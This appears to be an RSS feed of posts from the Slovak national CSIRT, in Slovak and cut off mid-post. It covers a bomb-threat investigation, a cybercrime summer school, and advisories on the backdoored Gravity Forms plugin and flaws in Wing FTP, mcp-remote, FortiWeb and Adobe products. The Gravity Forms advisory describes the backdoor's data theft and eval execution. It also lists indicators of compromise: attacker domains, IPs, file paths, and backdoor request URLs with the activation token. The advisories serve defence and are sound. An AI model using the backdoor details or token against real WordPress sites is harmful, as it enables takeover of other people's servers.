<p>VJ CSIRT (v gescii Sekcie kybernetickej bezpečnosti MIRRI SR) sa aktívne podieľala na riešení mimoriadne závažného bezpečnostného incidentu v úzkej spolupráci s Národnou centrálou osobitných druhov kriminality (NCODK), Protiteroristickou centrálou, Národnou centrálou proti terorizmu, extrémizmu a kybernetické kriminalite SKPV (ČR), Protizločineckou jednotkou ÚBOK a Kybernetickou políciou Ukrajiny. V rámci tejto spolupráce sme poskytli naše odborné kapacity a technické nástroje, ktoré významným spôsobom prispeli  k identifikácii a odhaleniu útočníka, ktorý v medzinárodnom meradle šíril bombové hrozby voči viacerým členským štátom Európskej únie. Tento prípad jasne ukázal, aký význam má efektívna koordinácia medzi bezpečnostnými zložkami a technologickými partnermi. Sme hrdí, že sme mohli byť súčasťou tohto medzinárodného tímu, ktorý posilnil bezpečnosť občanov a ochranu verejného poriadku nielen na Slovensku, ale aj v Európe.</p>



<p></p>



<p></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2568/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Členovia tímu CSIRT.SK na Letnej škole kyberkriminality 2025</title>
		<link>/posts/2563</link>
					<comments>/posts/2563#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 15 Jul 2025 15:02:34 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2563</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/LetnaSkolaKyberkriminality.png" alt="" /></p>V dňoch, 30. 6. – 4. 7. 2025 sa členovia VJ CSIRT zúčastnili Letnej školy kyberkriminality 2025, ktorú organizoval tím na...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/LetnaSkolaKyberkriminality.png" alt="" /></p>
<p>V dňoch, 30. 6. – 4. 7. 2025 sa členovia VJ CSIRT zúčastnili <a href="https://cyberawareness.sk/2025/07/12/letna-skola-kyberkriminality-2025/" data-type="link" data-id="https://cyberawareness.sk/letna-skola-kyberkriminality-2025/#">Letnej školy kyberkriminality 2025</a>, ktorú organizoval tím na riešenie počítačových bezpečnostných incidentov (CSIRT-UPJS), zameranej na priebeh riešenia kybernetického bezpečnostného incidentu, ako aj riešenia kybernetického trestného činu. Členovia VJ CSIRT vystupovali v roliach expertov na riešenie kybernetických bezpečnostných incidentov, hodnotiteľa projektov, služobne mladší aj ako účastníci.</p>



<p>Na letnej škole kyberkriminality si študenti vyskúšali, aké to je byť súčasťou tímu pre riešenie kybernetických bezpečnostných incidentov. Ich úlohou bolo reagovať na bezpečnostný incident nielen z technickej, ale aj z právnej stránky, keďže dôležitým prvkom Letnej školy je interdisciplinárny pohľad. Na úvod sa oboznámili s prostredím nástrojov bezpečnostného operačného centra (SOC) a analyzovali logy s cieľom vypracovať úvodný návrh časovej osi útoku. Následne sa venovali právnym aspektom – simulovali nahlásenie porušenia GDPR, podanie trestného oznámenia a dokonca aj vykonanie domovej prehliadky. Na dátach zaistených zariadení počas prehliadky študenti vykonali forenznú analýzu. Analyzovali zariadenia s&nbsp;operačným systémom Windows alebo GNU/Linux, ako aj malvér, ktorý útočník použil. Výsledkom všetkých aktivít bola finálna správa o bezpečnostnom incidente, ktorá obsahovala kompletný prehľad o celom priebehu útoku a reakcie naň.</p>



<p>Za vynikajúcu organizáciu podujatia a zvyšovanie povedomia o kybernetickej bezpečnosti by sme sa chceli poďakovať akademickému CSIRT-u Univerzity Pavla Jozefa Šafárika (CSIRT-UPJS) a menovite aj jeho vedúcemu, doc. RNDr. JUDr. Pavol Sokol, PhD. et PhD. a celému jeho tímu, ako aj expertom z praxe (hlavnými spoluautormi riešeného prípadu a podkladov sú Mgr. Ladislav Bačo zo spoločnosti ESET a JUDr. Michal Rampášek z CSIRT.SK), ktorí počas týždňa odovzdávali svoje cenné skúsenosti ďalej.</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="768" src="/wp-content/uploads/2025/07/20250630_113243622_iOS-scaled-1-1024x768.jpg" alt="" class="wp-image-2564"/></figure>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2563/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>WordPress plugin Gravity Forms zneužitý na šírenie škodlivého kódu</title>
		<link>/posts/2560</link>
					<comments>/posts/2560#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 15 Jul 2025 14:56:33 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Gravity Forms]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=2560</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/GravityForms.png" alt="" /></p>Útočníci kompromitovali systémy vývojárov populárneho modulu Gravity Forms pre WordPress a&#160;modifikáciou inštalačných súborov zrealizovali útok na dodávateľský reťazec, čím ohrozili...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/GravityForms.png" alt="" /></p>
<p><strong>Útočníci kompromitovali systémy vývojárov populárneho modulu Gravity Forms pre WordPress a&nbsp;modifikáciou inštalačných súborov zrealizovali útok na dodávateľský reťazec, čím ohrozili všetkých jeho používateľov. Jedná sa o&nbsp;celosvetovo rozšírený plugin, ktorý používajú aj spoločnosti ako Airbnb, Nike, Unicef či Google.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Modul WordPress Gravity Forms vo verziách 2.9.11.1 a 2.9.12, ktoré boli medzi 9. a&nbsp;10. júlom 2025 nainštalované prostredníctvom inštalátorov stiahnutých z&nbsp;webovej stránky výrobcu alebo&nbsp;prostredníctvom nástroja composer</li>
</ul>



<p><strong>Opis útoku:</strong></p>



<p><strong>Útočníci bližšie nešpecifikovaným spôsobom kompromitovali systémy vývojárov a&nbsp;modifikovali inštalačné súbory modulu.</strong></p>



<p>PHP súbor <strong>gravityforms/common.php</strong> obsahoval škodlivý kód, ktorý zbieral údaje ako metadáta, URL odkazy, cestu k administratívnemu rozhraniu, zoznam inštalovaných tém a modulov a informácie o inštalovanej verzii PHP a redakčného systému WordPress. Uvedené údaje prostredníctvom HTTP požiadaviek POST zasielal na útočníkovu doménu gravityapi[.]org/sites.</p>



<p>Odpoveď útočníkovho servera obsahovala PHP malvér kódovaný prostredníctvom BASE64, ktorý sa do súborov redakčného systému uložil ako wp-includes/bookmark-canonical.php. Malvér sa vydával za modul WordPress Content Management Tools a neautentifikovanému útočníkovi umožňoval vzdialené vykonanie kódu. Útočníkove vstupy sa spúšťali prostredníctvom funkcie EVAL.</p>



<p>Škodlivý kód bol odhalený aj vo funkcii list_sections v&nbsp;rámci <strong>includes/settings/class-settings.php</strong>, ktorá je volaná v&nbsp;rámci notification.php. Funkcia kontroluje hodnotu premennej $_REQUEST[&#8216;gf_api_token&#8217;] a v&nbsp;prípade špecifickej hodnoty vykonáva operácie definované v&nbsp;rámci $_REQUEST[&#8216;gf_api_action&#8217;]. Škodlivé operácie umožňujú &nbsp;vytvorenie nových administrátorských účtov, vykonanie škodlivého kódu prostredníctvom funkcie EVAL, nahratie súborov na server, zobrazenie používateľských kont v redakčnom systéme, mazanie používateľov a&nbsp;zobrazenie výpisu súborov na súborovom systéme.</p>



<p><strong>Vývojári škodlivý kód po prijatí hlásenia incidentu odstránili a&nbsp;vydali verziu 2.9.13, ktorá ho už neobsahuje.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť RocketGenius, ktorá je vývojárom modulu a&nbsp;bezpečnostní výskumníci z&nbsp;Patchstack odporúčajú bezodkladnú reinštaláciu všetkých inštancií modulu, ktoré boli medzi 9. a 10. júlom 2025 inštalované prostredníctvom inštalátorov z webovej stránky alebo prostredníctvom nástroja composer, na verziu 2.9.13.</p>



<p>Rovnako odporúčame preveriť integritu databázy a súborov redakčného systému WordPress a logy CMS, sieťových a bezpečnostných prvkov na prítomnosť indikátorov kompromitácie.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.gravityforms.com/blog/security-incident-notice/">https://www.gravityforms.com/blog/security-incident-notice/</a></li>



<li><a href="https://patchstack.com/articles/critical-malware-found-in-gravityforms-official-plugin-site/">https://patchstack.com/articles/critical-malware-found-in-gravityforms-official-plugin-site/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/wordpress-gravity-forms-developer-hacked-to-push-backdoored-plugins/">https://www.bleepingcomputer.com/news/security/wordpress-gravity-forms-developer-hacked-to-push-backdoored-plugins/</a></li>
</ul>



<p><strong>Indikátory kompromitácie:</strong></p>



<ul>
<li>24.245.59[.]0</li>



<li>185.193.89[.]19</li>



<li>185.243.113[.]108</li>



<li>193.160.101[.]6</li>



<li>194.87.63[.]219</li>



<li>gravityapi[.]org</li>



<li>gravityapi[.]io</li>



<li>gravityforms/common.php
<ul>
<li>&nbsp;hľadajte prítomnosť reťazca gravityapi[.]org a&nbsp;funkcie update_entry_detail</li>
</ul>
</li>



<li>includes/settings/class-settings.php
<ul>
<li>&nbsp;hľadajte prítomnosť funkcie list_sections</li>
</ul>
</li>



<li>wp-includes/bookmark-canonical.php</li>



<li>wp-includes/block-caching.php</li>



<li>volania v tvare:<ul><li>/wp-content/plugins/gravityforms_2.9.12/notification.php?gf_api_token=Cx3VGSwAHkB9yzIL9Qi48IFHwKm4sQ6Te5odNtBYu6Asb9JX06KYAWmrfPtG1eP3&amp;action=</li></ul><ul><li>/wp-content/plugins/gravityforms_2.9.11.1/notification.php?gf_api_token=Cx3VGSwAHkB9yzIL9Qi48IFHwKm4sQ6Te5odNtBYu6Asb9JX06KYAWmrfPtG1eP3&amp;action=</li></ul>
<ul>
<li>/wp-content/plugins/gravityforms/notification.php?gf_api_token=Cx3VGSwAHkB9yzIL9Qi48IFHwKm4sQ6Te5odNtBYu6Asb9JX06KYAWmrfPtG1eP3&amp;action=</li>
</ul>
</li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2560/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná kritická zraniteľnosť vo Wing FTP</title>
		<link>/posts/2557</link>
					<comments>/posts/2557#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 15 Jul 2025 14:53:48 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Wing FTP]]></category>
		<guid isPermaLink="false">/?p=2557</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/WingFTP.png" alt="" /></p>Vývojári FTP servera Wing FTP vydali bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť. CVE-2025-47812 možno zneužiť na vzdialené vykonanie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/WingFTP.png" alt="" /></p>
<p><strong>Vývojári FTP servera Wing FTP vydali bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť. CVE-2025-47812 možno zneužiť na vzdialené vykonanie systémových príkazov a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Wing FTP vo verziách starších ako &nbsp;7.4.4</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-47812 </strong>(CVSS skóre 10,0)</p>



<p>Kritická zraniteľnosť sa nachádza vo webovom rozhraní servera a&nbsp;spočíva v&nbsp;nesprávnom spracovaní tzv. nulových bajtov (&#8216;\0&#8217;) v&nbsp;rámci parametra username v&nbsp;koncovom bode loginok.html. Vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvorených vstupov mohol zneužiť na <strong>injekciu kódu v&nbsp;jazyku Lua do súborov používateľských relácií </strong>a&nbsp;následné <strong>vykonanie systémových príkazov</strong> <strong>s&nbsp;oprávneniami root (Linux) </strong>alebo<strong> NT AUTHORITY\SYSTEM (Windows)</strong>.</p>



<p><strong>Zraniteľnosť je aktívne zneužívaná minimálne od 1. júla 2025.</strong> Útočníci po získaní prístupu do systému spúšťajú rôzne príkazy pre <strong>enumeráciu a&nbsp;prieskum infraštruktúry</strong>, tvorbu nových používateľských účtov za účelom <strong>zachovania perzistencie</strong>, <strong>exfiltráciu citlivých údajov</strong> prostredníctvom cURL a LUA súbory slúžiace na <strong>doručenie inštalátora nástroja pre vzdialený manažment zariadení</strong> ScreenConnect. K&nbsp;samotnej inštalácii ScreenConnect v&nbsp;rámci analyzovaných incidentov zatiaľ nedošlo.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie príkazov</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame vykonať bezodkladnú aktualizáciu Wing FTP na verziu 7.4.4 alebo novšiu. V&nbsp;prípade, že aktualizáciu nie je možné vykonať, odporúčame vypnúť alebo obmedziť prístup k&nbsp;webovému rozhraniu aplikácie, deaktivovať anonymné prihlásenia a&nbsp;nasadiť zvýšený monitoring obsahu priečinka so súbormi používateľských relácií.</p>



<p>Taktiež odporúčame v&nbsp;logoch aplikácie a&nbsp;sieťových a&nbsp;bezpečnostných prvkov preveriť prítomnosť pokusov o&nbsp;zneužitie zraniteľnosti<strong>. </strong><strong>Detailný popis zraniteľnosti, návod pre detekciu pokusov o&nbsp;jej zneužitie, indikátory kompromitácie a&nbsp;SIGMA pravidlá pre detekciu môžete nájsť online v&nbsp;</strong><a href="https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild"><strong>analýze výskumníkov z Huntress</strong></a><strong>.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.wftpserver.com/download.htm">https://www.wftpserver.com/download.htm</a></li>



<li><a href="https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild">https://www.huntress.com/blog/wing-ftp-server-remote-code-execution-cve-2025-47812-exploited-in-wild</a></li>



<li><a href="https://censys.com/advisory/cve-2025-47812">https://censys.com/advisory/cve-2025-47812</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-critical-rce-flaw-in-wing-ftp-server/">https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-critical-rce-flaw-in-wing-ftp-server/</a></li>



<li><a href="https://thehackernews.com/2025/07/critical-wing-ftp-server-vulnerability.html">https://thehackernews.com/2025/07/critical-wing-ftp-server-vulnerability.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2557/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v NPM knižnici mcp-remote umožňuje vzdialené vykonanie príkazov</title>
		<link>/posts/2554</link>
					<comments>/posts/2554#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 15 Jul 2025 14:49:58 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[MCP]]></category>
		<category><![CDATA[mcp-remote]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2554</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/mcp-1024x710.png" alt="" /></p>Vývojári NPM knižnice mcp-remote vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. MCP (Model Context Protocol) protokol predstavuje štandard...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/mcp-1024x710.png" alt="" /></p>
<p><strong>Vývojári NPM knižnice mcp-remote vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú kritickú zraniteľnosť. MCP (Model Context Protocol) protokol predstavuje štandard pre integráciu a výmenu dát medzi LLM modelmi a externými dátovými zdrojmi alebo službami. CVE-2025-6514 možno zneužiť na vzdialené vykonanie príkazov operačného systému.</strong><strong></strong></p>



<p><strong>Zraniteľné systémy:</strong><strong></strong></p>



<ul>
<li>mcp-remote vo verziách 0.0.5 až 0.1.15</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong><strong></strong></p>



<p><strong>CVE-2025-6514 </strong>(CVSS 3.1 skóre: 9,6)</p>



<p>Kritická zraniteľnosť spočíva v&nbsp;mechanizme spracovania dát prenášaných počas autorizačnej fázy zostavovania spojenia so vzdialeným MCP serverom. Vzdialený útočník by prostredníctvom špeciálne konfigurovaného MCP servera mohol do týchto dát vložiť <strong>príkaz, ktorý po spracovaní prostredníctvom mcp-remote vykoná operačný systém</strong>. Na operačnom systéme Windows má útočník plnú kontrolu nad parametrami príkazu. V&nbsp;prípade operačných systémov macOS a&nbsp;Linux má len obmedzenú kontrolu nad parametrami.</p>



<p>Zneužitie zraniteľnosti <strong>vyžaduje interakciu zo strany používateľa</strong>, ktorý musí iniciovať spojenie s MCP serverom pod kontrolou útočníka.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie príkazov</strong><strong></strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;vývojárom odporúčame uistiť sa, či ich aplikácie a&nbsp;služby nevyužívajú NPM knižnicu mcp-remote v&nbsp;zraniteľných verziách. V&nbsp;prípade, že áno odporúčame bezodkladnú aktualizáciu na verziu 0.1.16 alebo novšiu. Za účelom zvýšenia bezpečnosti taktiež odporúčame povoliť len HTTPS komunikáciu s&nbsp;dôveryhodnými MCP servermi.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://github.com/geelen/mcp-remote">https://github.com/geelen/mcp-remote</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-6514">https://nvd.nist.gov/vuln/detail/CVE-2025-6514</a></li>



<li><a href="https://jfrog.com/blog/2025-6514-critical-mcp-remote-rce-vulnerability/">https://jfrog.com/blog/2025-6514-critical-mcp-remote-rce-vulnerability/</a></li>



<li><a href="https://thehackernews.com/2025/07/critical-mcp-remote-vulnerability.html">https://thehackernews.com/2025/07/critical-mcp-remote-vulnerability.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2554/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť webového aplikačného firewallu Fortinet FortiWeb</title>
		<link>/posts/2552</link>
					<comments>/posts/2552#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 15 Jul 2025 14:46:36 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Fortinet]]></category>
		<category><![CDATA[FortiWeb]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2552</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť Fortinet vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť vo webovom aplikačnom firewalle Fortinet FortiWeb. CVE-2025-25257 možno zneužiť na vzdialené...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť Fortinet vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť vo webovom aplikačnom firewalle Fortinet FortiWeb. CVE-2025-25257 možno zneužiť na vzdialené vykonanie kódu a&nbsp;úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému.</strong><strong></strong></p>



<p><strong>Zraniteľné systémy:</strong><strong></strong></p>



<ul>
<li>FortiWeb 7.6.X vo verziách starších ako 7.6.4</li>



<li>FortiWeb 7.4.X vo verziách starších ako 7.4.8</li>



<li>FortiWeb 7.2.X vo verziách starších ako 7.2.11</li>



<li>FortiWeb 7.0.X vo verziách starších ako 7.0.11</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong><strong></strong></p>



<p><strong>CVE-2025-25257 </strong>(CVSS 3.1 skóre: 9,6)</p>



<p>Kritická zraniteľnosť sa nachádza v&nbsp;grafickom používateľskom rozhraní a spočíva v nesprávnej neutralizácii špeciálnych prvkov používaných v&nbsp;rámci SQL príkazov. Vzdialený neautentifikovaný útočník by ju zaslaním HTTP požiadaviek so špeciálne vytvoreným bearer tokenom mohol zneužiť na <strong>SQL injekciu</strong> vedúcu k&nbsp;<strong>vzdialenému vykonaniu príkazov alebo kódu</strong>.</p>



<p>Výskumníci z&nbsp;WatchTowr 11. júla 2025 zverejnili proof-of-concept (PoC) kód demonštrujúci postup zneužitia zraniteľnosti na vytvorenie reverzného shell-u.<strong> V&nbsp;súvislosti so zverejnením PoC možno zo strany útočníkov očakávať aktivity na identifikáciu zraniteľných zariadení a&nbsp;následné pokusy o&nbsp;zneužitie zraniteľnosti.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong><strong></strong></li>



<li><strong>Úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Výrobca odporúča používať len produkty s&nbsp;technickou podporou. Administrátorom odporúčame bezodkladnú aktualizáciu Fortinet FortiWeb na verzie 7.6.4, 7.4.8, 7.2.11 alebo 7.0.11.</p>



<p>V&nbsp;prípade, že aktualizáciu systémov nie je možné vykonať, zraniteľnosť je možné mitigovať vypnutím HTTP/HTTPS prístupu k&nbsp;administratívnemu rozhraniu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://fortiguard.fortinet.com/psirt/FG-IR-25-151">https://fortiguard.fortinet.com/psirt/FG-IR-25-151</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/exploits-for-pre-auth-fortinet-fortiweb-rce-flaw-released-patch-now/">https://www.bleepingcomputer.com/news/security/exploits-for-pre-auth-fortinet-fortiweb-rce-flaw-released-patch-now/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2552/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické bezpečnostné zraniteľnosti v produktoch Adobe</title>
		<link>/posts/2548</link>
					<comments>/posts/2548#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 11 Jul 2025 13:56:17 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2548</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty After Effects, Substance 3D Viewer, Audition, InCopy , InDesign, Connect , Dimension,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>
<p><strong>Spoločnosť Adobe vydala bezpečnostné aktualizácie na svoje produkty After Effects, Substance 3D Viewer, Audition, InCopy , InDesign, Connect , Dimension, Substance 3D Stager, Illustrator, FrameMaker, AEM Forms , AEM Screens a ColdFusion, ktoré opravujú 60 zraniteľností, z&nbsp;čoho &nbsp;38 je označených ako kritických. Kritické zraniteľnosti by vzdialený útočník mohol zneužiť na obídenie bezpečnostných prvkov, eskaláciu privilégií a&nbsp;vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Adobe After Effects 24.6.X vo verziách starších ako 24.6.7</li>



<li>Adobe After Effects 25.X vo verziách starších ako 25.3</li>



<li>Adobe Substance 3D Viewer vo verziách starších ako 0.25</li>



<li>Adobe Audition 24.6.X vo verziách starších ako 24.6.7</li>



<li>Adobe Audition 25.X vo verziách starších ako 25.3</li>



<li>Adobe InCopy 20.X vo verziách starších ako 20.4</li>



<li>Adobe InCopy 19.X vo verziách starších ako 19.5.4</li>



<li>Adobe InDesign ID20.X vo verziách starších ako ID20.4</li>



<li>Adobe InDesign ID19.5.X vo verziách starších ako ID19.5.4</li>



<li>Connect Windows App vo verziách starších ako 25.1</li>



<li>Adobe Dimension vo verziách starších ako 4.1.3</li>



<li>Adobe Substance 3D Stager vo verziách starších ako 3.1.3</li>



<li>Illustrator 2025 29.X vo verziách starších ako 29.6</li>



<li>Illustrator 2024 28.7.X vo verziách starších ako 28.7.8</li>



<li>Adobe FrameMaker FrameMaker 2020 vo verziách bez inštalovanej záplaty Update 9</li>



<li>Adobe FrameMaker FrameMaker 2022 vo verziách bez inštalovanej záplaty Update 7</li>



<li>Adobe Experience Manager (AEM) Forms on JEE vo verziách starších ako 6.5.0.0.20250527.0</li>



<li>Adobe Experience Manager (AEM) Screens vo verziách starších 6.5.22 Screens FP11.6</li>



<li>ColdFusion 2025 vo verziách bez inštalovanej záplaty Update 3</li>



<li>ColdFusion 2023 vo verziách bez inštalovanej záplaty Update 15</li>



<li>ColdFusion 2021 vo verziách bez inštalovanej záplaty Update 21</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Adobe Substance 3D Viewer:</u></strong></p>



<p><strong>CVE-2025-43582 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosť spočíva v&nbsp;pretečení medzipamäte haldy a možno ju zneužiť na <strong>vykonanie kódu</strong>.</p>



<p><strong><u>Adobe InCopy:</u></strong></p>



<p><strong>CVE-2025-47097, CVE-2025-47098, CVE-2025-47099 </strong>(CVSS skóre 7,8)</p>



<p>Podtečenie celočíselnej premennej (CVE-2025-47097), prístup k&nbsp;neinicializovanému ukazovateľu (CVE-2025-47098) a&nbsp;pretečenie medzipamäte haldy (CVE-2025-47099) v&nbsp;produkte Adobe InCopy možno podvrhnutím špeciálne vytvorených súborov zneužiť na <strong>vykonanie kódu</strong>.</p>



<p><strong><u>Adobe InDesign:</u></strong></p>



<p><strong>CVE-2025-47136, CVE-2025-43591, CVE-2025-43592, CVE-2025-43594, CVE-2025-47103, CVE-2025-47134 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosti v&nbsp;InDesign spočívajúce v podtečení celočíselnej premennej (CVE-2025-47136), prístupe k&nbsp;neinicializovanému ukazovateľu (CVE-2025-43592), zápise mimo povolených hodnôt (CVE-2025-43594) a pretečení medzipamäte haldy (CVE-2025-43591, CVE-2025-47103, CVE-2025-47134) možno zneužiť na <strong>vykonanie kódu</strong>.</p>



<p><strong><u>Adobe Connect:</u></strong></p>



<p><strong>CVE-2025-27203 </strong>(CVSS skóre 9,3)</p>



<p>Kritickú zraniteľnosť s&nbsp;identifikátorom CVE-2025-27203 možno zneužiť podvrhnutím špeciálne vytvorených dát, ktorých deserializácia vedie k <strong>vykonaniu kódu</strong>.</p>



<p><strong><u>Adobe Dimension:</u></strong></p>



<p><strong>CVE-2025-30312 </strong>(CVSS skóre 7,8)</p>



<p>Zápis mimo povolených hodnôt v&nbsp;Adobe Dimension možno zneužiť na <strong>vykonanie kódu</strong>.</p>



<p><strong><u>Adobe Illustrator:</u></strong></p>



<p><strong>CVE-2025-49526, CVE-2025-49527, CVE-2025-49528, CVE-2025-49529, CVE-2025-49530, CVE-2025-49531, CVE-2025-49532 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosti spočívajúce v&nbsp;pretečení (CVE-2025-49531) a podtečení (CVE-2025-49532) celočíselnej premennej, pretečení vyrovnávacej pamäte zásobníka (CVE-2025-49527, CVE-2025-49528), prístupe k neinicializovanému ukazovateľu (CVE-2025-49529) a zápise mimo povolených hodnôt (CVE-2025-49526, CVE-2025-49530) možno zneužiť na <strong>vykonanie kódu</strong>.</p>



<p><strong><u>Adobe FrameMaker:</u></strong></p>



<p><strong>CVE-2025-47121, CVE-2025-47122, CVE-2025-47123, CVE-2025-47124, CVE-2025-47125, CVE-2025-47126, CVE-2025-47127, CVE-2025-47128, CVE-2025-47129, CVE-2025-47130, CVE-2025-47131, CVE-2025-47132, CVE-2025-47133 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosti spočívajúce v&nbsp; podtečení celočíselnej premennej (CVE-2025-47128, CVE-2025-47130), prístupe k neinicializovanému ukazovateľu (CVE-2025-47121), pretečení medzipamäte haldy (CVE-2025-47122, CVE-2025-47123, CVE-2025-47125, CVE-2025-47131) a zápise mimo povolených hodnôt (CVE-2025-47124, CVE-2025-47126, CVE-2025-47127, CVE-2025-47129, CVE-2025-47132, CVE-2025-47133) možno zneužiť na <strong>vykonanie kódu</strong>.</p>



<p><strong><u>Adobe AEM Forms:</u></strong></p>



<p><strong>CVE-2025-49533</strong> (CVSS skóre 9,8)</p>



